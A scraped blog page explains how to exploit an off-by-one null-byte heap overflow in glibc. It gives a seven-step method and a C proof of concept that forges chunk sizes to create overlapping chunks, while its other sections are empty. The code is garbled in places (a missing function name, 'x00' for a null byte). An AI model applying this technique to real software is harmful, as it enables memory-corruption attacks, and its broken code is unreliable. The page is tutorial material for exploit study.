首页 > itarticle > eploit-ways-of-off-by-one unlink references

eploit-ways-of-off-by-one unlink references

admin 11月 13, 2020 0

off-by-one overwrite allocated

……

off-by-one overwrite freed

……

off-by-one null byte

  • In this exploit, the oveflow byte can only be a null byte ‘x00’.

  • The heap layout is like this:

  • Exploit steps:

1
2
3
4
5
6
7
 
malloc three chunks A, B and C (There is an off-by-one in chunk A).
free chunk B.
overflow from chunk A to reduce the size of chunk B.
malloc chunk B1 and B2.
free chunk B1 and C.
malloc a new chunk, whose size consists of B's and C's size.
arbitrary reading and writing chunk B2.
  • Sample code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
 

#include<stdlib.h>
 
int ()
{
    unsigned long *p1 = malloc(0x30);
    unsigned long *p2 = malloc(0x160);
    unsigned long *p3 = malloc(0xf0);
    malloc(0x50);

    

    free(p2);
 
    //state-2
    //off-by-one null byte vulnerability
    unsigned char *pc = (unsigned char*)p1;
    *(pc + 0x38) = 'x00';
 
    //create a fake adjacent next chunk
    *(p2 + 31) = 0x70;
    *(p2 + 30) = 0x100;  //0x100 = p2.size & ~0xff
 
    //state-3
    unsigned long *p4 = malloc(0x80); //check size & pre_size 
    unsigned long *p5 = malloc(0x30);
    
    //state-4
    free(p4);
    //create a overlapping chunk in unsorted bin
    free(p3);

    //state-5
    //You can use the overlapping chunk to do some thing here.
    unsigned long *p6 = malloc(0x260); //p2+p3=p4+p5+...+p3
    printf("%llx  %llxn", *(p6+(0xd0)/8), *(p6+(0xd0)/8));
    return 0;
}

unlink

……

references

微海报分享

近期文章

近期评论

标签

热门

文章归档

分类目录

功能